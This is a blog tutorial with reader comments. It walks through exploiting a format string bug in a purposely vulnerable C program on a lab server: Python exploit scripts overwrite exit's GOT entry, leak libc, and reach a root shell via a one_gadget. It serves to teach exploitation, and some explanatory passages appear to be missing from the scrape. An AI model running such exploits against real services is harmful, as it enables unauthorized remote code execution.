Format Strings: GOT overwrite to change Control Flow Remotely on ASLR
Previously we saw how we can use format strings to leak memory and return to plt to bypass ASLR. In this article we will see what more can we do with format string exploits.
We had format string vulnerability in the printf function, let's head to man page of printf.
We had format string vulnerability in the printf function, let's head to man page of printf.
Conversion specifiers
    A character that specifies the type of conversion to be applied.
    The conversion specifiers and their meanings are:
n      The  number  of characters written so far is stored into the integer
       pointed to by the corresponding argument.  That argument shall be an
       int *, or variant whose size matches the (optionally) supplied integer
       length modifier.  No argument is converted.  (This specifier is not
       supported by the bionic C library.)  The behavior is  undefined  if the
       conversion specification includes any flags, a field width, or a precision.Let's take a look at this code.
Clearly at line 15, we can see format string vulnerability. Compile it with '-no-pie' flag. Position Independent Executable (PIE) is an exploit mitigation technique which loads different sections of executable at random addresses making it harder for attacker to find correct address. Addresses in such executables are usually calculated by relative offsets. We don't want that now.
virtual@mecha:~$ gcc frmt_str.c -o frmt_str -no-pieFormat Strings: Few basics
Let's run the program we just compiled and input some format strings. 
virtual@mecha:~$ ./frmt_str
########  Welcome to Open Message Server ########
Enter message(max 150 chars): %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p 
Sent !
0x8d6260 0x7fdc0e42d720 0x7fdc0e3597a8 0x7fdc0e432500 0x77 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0xa2070252070 0x9 0xf0b5ff 0xc2 0x7ffc19269816 virtual@mecha:~$ ./frmt_str
########  Welcome to Open Message Server ########
Enter message(max 150 chars): %6$p %p %p %p %p %p %p %p %p %p %p %p %p %p %p
Sent !
0x2070252070243625 0x602260 0x7ffff7f82720 0x7ffff7eae7a8 0x7ffff7f87500 0x77 0x2070252070243625 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0xa702520702520 0x9 0xf0b5ff 0xc2virtual@mecha:~$ ./frmt_str
########  Welcome to Open Message Server ########
Enter message(max 150 chars): %5$p %5$p %5$p %5$p %5$p %5$p %5$p %5$p %5$p %5$p %5$p %5$p %5$p %5$p %5$p 
Sent !
0x77 0x77 0x77 0x77 0x77 0x77 0x77 0x77 0x77 0x77 0x77 0x77 0x77 0x77 0x77virtual@mecha:~$ ./frmt_str
########  Welcome to Open Message Server ########
Enter message(max 150 chars): %5$p %5$100p %p %60p %p %p %p %p %p %p %p %p %p %p %p
Sent !
0x77                                               0x77 0x602260                           0x7ffff7f82720 0x7ffff7eae7a8 0x7ffff7f87500 0x77 0x2435252070243525 0x2070252070303031 0x2070252070303625 0x7025207025207025 0x2520702520702520 0x2070252070252070 0xa7025207025 0xf0b5ffTime to test our notorious '%n' format specifier. It basically just writes the number of bytes to the memory location it is pointing to. In the above examples if we replace a 'p' with 'n', it will try to write to memory location printed by that particular 'p' with number of bytes printed on screen till then.Let's test that in gdb.
virtual@mecha:~$ gdb frmt_str -q
Reading symbols from frmt_str...(no debugging symbols found)...done.
gdb-peda$ aslr off
gdb-peda$ r <<< "ABCDEFGH%p"                 <== 8 bytes then %p
Starting program: /home/archer/Documents/frmt_str <<< "ABCDEFGH%p"
########  Welcome to Open Message Server ########
Enter message(max 150 chars): Sent !
ABCDEFGH0x602260                             <== 8 bytes then an address
[Inferior 1 (process 5079) exited normally]
Warning: not running or target is remote
gdb-peda$ b *main+137
Breakpoint 1 at 0x40072b
gdb-peda$ r <<< "ABCDEFGH%n"                 <== %p replaced with %n. Number of bytes will be written at the address
Starting program: /home/archer/Documents/frmt_str <<< "ABCDEFGH%n"
########  Welcome to Open Message Server ########
Enter message(max 150 chars): Sent !
ABCDEFGH
Breakpoint 1, 0x000000000040072b in main ()
gdb-peda$ x 0x602260
0x602260: 0x4847464500000008                 <== 8 bytes stored at addressExploiting the program
Our main concern here is that the program never returns. It exits directly. Even if we overwrite something with format string vulnerability, we may not be able to use that. Also ASLR will be on, so once program exits, our memory leak won't be useful.
Top priority is to stop the program from exiting. But how ? think !
[Hint: Global Offset Table]
We learned in last article how Procedure Linkage Table and Global Offset Table work. Our functions which are defined in shared libraries like libc find their addresses with the help of PLT and GOT. Also GOT is writable and whenever these functions(like exit(), printf(), etc.) are called, GOT entry of respective function is looked up first, then program counter jumps to that address.
What if we modify the GOT entry of a function with format strings. Whenever that function will be called, the program counter will go to the modified GOT entry. Great. Finally we have control over program counter.
Now regarding keeping the leaks useful cause of ASLR and then crafting and sending an exploit from it. Seems like we need to provide input 2-3 times to the program for it to spit out necessary information to craft an exploit.
Best way to do that ? Just don't let the program die and still make it prompt input. What I did was to overwrite the GOT entry of exit() function to _start of program so whenever exit is called, the program starts again without getting killed.
_start() from exit()
From gdb we can find address of _start function.
gdb-peda$ info functions _start 
All functions matching regular expression "_start":
Non-debugging symbols:
0x00000000004005c0  _startThat is a lot of bytes. You can try that but as numbers go bigger, it is not efficient and will take up lot of time. What else can be done ?
We can divide the address in multiple parts. First we will use %p to print
0xc0 i.e. 192 bytes and a %n pointing to exit@got.plt, then for the rest 0x4005 i.e. 16,389 bytes part we need (16389-192=) 16197 bytes more with %p and then next "%n" at (exit@got.plt+1) address. And finally there will be address of exit@got.plt and exit@got.plt+1 in payload so that we can make %n point to it.Confusing ? You will understand more in practical. Till then try playing with format strings a bit. See how changing number of bytes in input affects where you point to. May be disable ASLR for a bit.
So if you tried playing with different types of input and lengths, you will notice that a particular format string will show different content if length of input is changed. No idea what I'm talking about ? As we know we can dump contents of memory with format strings. It may also show us the contents in local variables. In this program our input is stored in a local variable. When we change length of input the %p still points to same memory location but the contents of that location are changed. So while trying out different inputs we might want our input with constant length for ease in finding contents in memory and debugging the exploit. I already have my program running as root on remote server at port 5555 with this command.
$ sudo socat tcp-listen:5555,reuseaddr,fork, exec:"./frmt_str"from telnetlib import Telnet
from struct import pack
p64 = lambda x : pack("Q",x)
p=Telnet('192.168.43.81',5555)                    #remote ip and port
exit_got=0x601038                                 #address of 
_start=0x4005c0                   #4195776        address of _start function
buf = ""                                          #payload
buf+='%p%p%p%p'.ljust(24)                         #adjust the size of string to be always 24 bytes
buf+=p64(exit_got)
buf+=p64(exit_got+1)
print p.read_until("s):")                         #read from network
p.write(buf+'\n')                                 #write to network
p.interact()
 $ python2 tst.py
########  Welcome to Open Message Server ########
Enter message(max 150 chars):
 Sent !
0x746e65530x7fed84e6e8c00x2120746e0x7fed850804c0                8from telnetlib import Telnet
from struct import pack
p64 = lambda x : pack("Q",x)
#p=process('./frmt_str')
p=Telnet('192.168.43.81',5555)
exit_got=0x601038
_start=0x4005c0                     #4195776
buf = ""
buf+='%p%9$p%p%10$p'.ljust(24)
buf+=p64(exit_got)
buf+=p64(exit_got+1)
print p.read_until("s):")
p.write(buf+'\n')
p.interact()$ python2 tst.py
########  Welcome to Open Message Server ########
Enter message(max 150 chars):
 Sent !
0x746e65530x6010380x7ff78d3088c00x601039           80xc0 i.e. 192 bytes and then third to print rest 0x4005 i.e. 16,389 bytes part we need (16389-192=) 16197 bytes. After payload is executed, the got entry of exit will now point to _start of program. New payload -from telnetlib import Telnet
from struct import pack
p64 = lambda x : pack("Q",x)
#p=process('./frmt_str')
p=Telnet('192.168.43.81',5555)
exit_got=0x601038
_start=0x4005c0 #4195776
buf = ""
buf+='%192p%9$n%16197p%10$n'.ljust(24)
buf+=p64(exit_got)
buf+=p64(exit_got+1)
print p.read_until("s):")
p.write(buf+'\n')
p.interact()$ python2 tst.py
########  Welcome to Open Message Server ########
Enter message(max 150 chars):
 Sent !
.
[redacted empty space]
.              0x746e6553
.
.
[redacted]
.
.   0x7f8f9bebf8c0   8 `########  Welcome to Open Message Server ########
Enter message(max 150 chars): %p%p%p%p%p%p
Sent !
0x746e65530x7f8f9bebf8c00x2120746e0x7f8f9c0d14c0(nil)0x7025702570257025
########  Welcome to Open Message Server ########
Enter message(max 150 chars): %p%p%p%p%p%p
Sent !
0x746e65530x7f8f9bebf8c00x2120746e0x7f8f9c0d14c0(nil)0x7025702570257025
########  Welcome to Open Message Server ########
Enter message(max 150 chars):And now our program will run in an infinite loop and we can gather more info to craft an exploit for remote code execution.
Now for rce we'll do return to libc. First you might wanna find out the version of libc on target. The OS and version may be guessed through some reconnaissance or some more reliable methods we will discuss in next article where we will exploit on a completely unknown libc.
In this program, we may try to dump data from stack and will check if we find any libc address in it. You might wanna turn off ASLR on your test target and find the address range of libc with vmmap in gdb peda or
cat /proc/$pid/maps to view memory maps.from telnetlib import Telnet
from struct import pack
p64 = lambda x : pack("Q",x)
#p=process('./frmt_str')
p=Telnet('192.168.43.81',5555)
exit_got=0x601038
_start=0x4005c0               #4195776
buf = ""
buf+='%192p%9$n%16197p%10$n'.ljust(24)
buf+=p64(exit_got)
buf+=p64(exit_got+1)
print p.read_until("s):")
p.write(buf+'\n')
print p.read_until("s):")
buf=""
buf+="%p "*30
p.write(buf+'\n')
print p.read_until("Sent !\n")
rec = p.read_until("s):").split(' ')
print rec
print "[*] Possible libc address rec[26]:",rec[26]$ python2 frmt_str.py
########  Welcome to Open Message Server ########
Enter message(max 150 chars):
 Sent !
['0x746e6553', '0x7ffff7dd18c0', '0x2120746e', '0x7ffff7fde4c0', '(nil)', '0x7025207025207025', '0x2520702520702520', '0x2070252070252070', '0x7025207025207025', '0x2520702520702520', '0x2070252070252070', '0x7025207025207025', '0x2520702520702520', '0x2070252070252070', '0x7025207025207025', '0x2520702520702520', '0x62b52fa4f00a2070', '(nil)', '0x40077d', '0x4005c0', '(nil)', '0x400730', '0x4005c0', '0x7fffffffe580', '0x62b52fa4f0c2f600', '0x400730', '0x7ffff7a05b97', '0x7fffffffe340', '0x7fffffffe400', '0x40073000000000', '\n\xf0\xa4/\xb5b########', '', 'Welcome', 'to', 'Open', 'Message', 'Server', '########\n\nEnter', 'message(max', '150', 'chars):']
[*] Possible libc address rec[26]: 0x7ffff7a05b97Next we will search for one gadget in target libc.
$ one_gadget /lib/x86_64-linux-gnu/libc.so.6
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rcx == NULL
0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL
0x10a38c execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULLlibc_start_main = int(rec[26],16)
libc_base_off = 0x21b97
one_gadget_off = 0x10a38c
libc_base = libc_start_main - libc_base_off
one_gadget = hex(libc_base + one_gadget_off)
print "[*] Found libc base:",hex(libc_base)
print "[*] One gadget location:",one_gadgetWe can again use format string to overwrite got entry of a function and change it to our gadget. But we have some problems we need to solve. If you were able to follow this far, try doing it further and solving any problems yourself now. You might even discover some new ways. If stuck you may read further to find how I did.
Since we are using format string to overwrite got entry, we need to print that number of bytes for address. You will see address in libc is actually very large number. To do this efficiently we can split it into 4-5 small parts. The problem is, since the ASLR is on, our exploit code needs to calculate how to split the address every-time. Let's see how we can do it. You can try to implement your own algorithm for it.
Take this address in libc for example
0x7f8e9def138c. I will divide address into 5 parts and then overwrite exit@got.plt byte by byte starting from least significant byte like this:a=int(one_gadget[:6],16)         #0x7f8e
b=int('0x'+one_gadget[6:8],16)   #0x9d
c=int('0x'+one_gadget[8:10],16)  #0xef
d=int('0x'+one_gadget[10:12],16) #0x13
e=int('0x'+one_gadget[12:],16)   #0x8cSo we may not be able to overwrite with 0x13 since it's smaller than number of previously printed bytes i.e. 140. But 0x1 13(275) is more than 140. We can print 0x1 13 bytes and overwrite just '0x1' from '0x1 13 ' with next %n. In other words we overflow into next byte and overwrite next byte with next %n. This can be done by adding 0x100 to smaller value until becomes greater than previous. Similar overflow can be used for c,d and b,c when value of latter is less than total number of bytes printed. And at last 'a'(0x7f8e) is overwritten on the address. Here's how the payload will be.
while e>d:
 d+=0x100                #add 0x100 till d becomes greater than e
while d>c:
 c+=0x100
while c>b:
 b+=0x100
buf = ""                 #specify the number of bytes and point to correct address
buf+="%{0}p%13$n%{1}p%14$n%{2}p%15$n%{3}p%16$n%{4}p%17$n".format(e,d-e,c-d,b-c,a-b).ljust(56)
buf+=p64(exit_got)                                        #subtracted to reduce number of bytes already printed
buf+=p64(exit_got+1)             # 5 addresses byte by byte
buf+=p64(exit_got+2)
buf+=p64(exit_got+3)
buf+=p64(exit_got+4)
buf+=p64(0x0)*2                # just some nulls for cleaner stackWe made the final payload. Time to put everything together and test. Here's my exploit.
You might require some changes. Also if you face problems try troubleshooting by attaching to process in gdb or any debugger of your choice. Check if you are able to overwrite address correctly.
Running the exploit:
attacker@server:~$ python2 frmt_str.py
########  Welcome to Open Message Server ########
Enter message(max 150 chars):
 Sent !
                                                                                                                                                                                      0x746e6553
.
[redacted]
.
0x7f293a0fd8c0   8 `########  Welcome to Open Message Server ########
Enter message(max 150 chars):
 Sent !
['0x746e6553', '0x7f293a0fd8c0', '0x2120746e', '0x7f293a30f4c0', '(nil)', '0x7025207025207025', '0x2520702520702520', '0x2070252070252070', '0x7025207025207025', '0x2520702520702520', '0x2070252070252070', '0x7025207025207025', '0x2520702520702520', '0x2070252070252070', '0x7025207025207025', '0x2520702520702520', '0x27d3c871560a2070', '(nil)', '0x40077d', '0x4005c0', '(nil)', '0x400730', '0x4005c0', '0x7ffe8a45fef0', '0x27d3c87156e3a200', '0x400730', '0x7f2939d31b97', '0x7ffe8a45fcb0', '0x7ffe8a45fd70', '0x40073000000000', "\nVq\xc8\xd3'########", '', 'Welcome', 'to', 'Open', 'Message', 'Server', '########\n\nEnter', 'message(max', '150', 'chars):']
[*] Possible libc address rec[26]: 0x7f2939d31b97
[*] Found libc base: 0x7f2939d10000
[*] One gadget location: 0x7f2939e1a38c
Press Enter >
 Sent !
                                                                                                                                  0x746e6553         0x7f293a0fd8c0                                                    0x2120746e                                                                          0x7f293a30f4c0
.
[redacted]
.
.
uid=0(root) gid=0(root) groups=0(root)
root@mecha:~# whoami
whoami
root
root@mecha:~# pwd
pwd
/home/virtual
root@mecha:~#You might have seen RELRO as an exploit mitigation technique.
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : PartialIn next article we will try to exploit a completely unknown libc on a remote system with ASLR.
For further queries contact me @ShivamShrirao.
Next read: Leak libc addresses from GOT to exploit unknown libc, bypassing ASLR remotely 64 bit

 
 
Could you help me ?
ReplyDeleteWhen i run frmt_str.py i get disconnected immidiately?
Previous pieces of python code worked until i reached this part:
while e>d:
d+=0x100 #add 0x100 till d becomes greater than e
while d>c:
c+=0x100
while c>b:
b+=0x100
buf = "" #specify the number of bytes and point to correct address
buf+="%{0}p%13$n%{1}p%14$n%{2}p%15$n%{3}p%16$n%{4}p%17$n".format(e,d-e,c-d,b-c,a-b).ljust(56)
buf+=p64(exit_got) #subtracted to reduce number of bytes already printed
buf+=p64(exit_got+1) # 5 addresses byte by byte
buf+=p64(exit_got+2)
buf+=p64(exit_got+3)
buf+=p64(exit_got+4)
buf+=p64(0x0)*2
Well this part of code is kinda hacky I made to work for me. It's simple maths to align and overwrite to target address correctly. You should probably edit it according to your address doing good debugging so that each part of address fits correctly to target. First thing you should focus on is how you overwrite got entry of exit and how I have divided the address so that I overwrite and make my final address in multiple steps. Try making your own code to divide address in steps first. You may disable ASLR, it will be easier to understand then. Then make code so that it will figure out way to divide any address. It may not be easy to understand at first but do some trial and error and keep looking address with gdb at each step.
DeleteBtw also make sure your libc base and one gadget address is correct.
DeleteHi Shivam,
ReplyDelete"In next article we will try to exploit a completely unknown libc on a remote system with ASLR."
when you will publish it? =)
Really sorry it took this long to complete. I got busy with other stuff and just left. But finally I am completing the article. It's half way done. Will be published in a day or two. Thank you.
DeleteHey, it's published now.
DeleteI haven't had come across a great article that explains so many things in a such a nice way in a while. Kudos to u. I also solved a redpwnctf2020 pwn problem using 2 of ur articles. Thnx for making my day.
ReplyDeleteAwesome. That's great to hear. Your comment made my day.
DeleteCould you use this technique to change the instruction pointer to a puts function call in the binary, and get it to print the address of puts in libc to determine the libc version? Would you have to put the GOT address at the start of the payload, so it is passed to puts as an argument (on 32 bit). Or is there an easier way to determine the libc version using a format string vulnerability.
ReplyDeleteYes you can although you need to setup more ROP chain to fill proper arguments in registers for puts. And for 32 bit you need to check where exactly on stack your arguments are placed and then align them accordingly.
DeleteI have discussed a few more methods for without format string in this article.
https://www.ret2rop.com/2020/04/got-address-leak-exploit-unknown-libc.html
great article and thanks for sharing your knowledge
ReplyDelete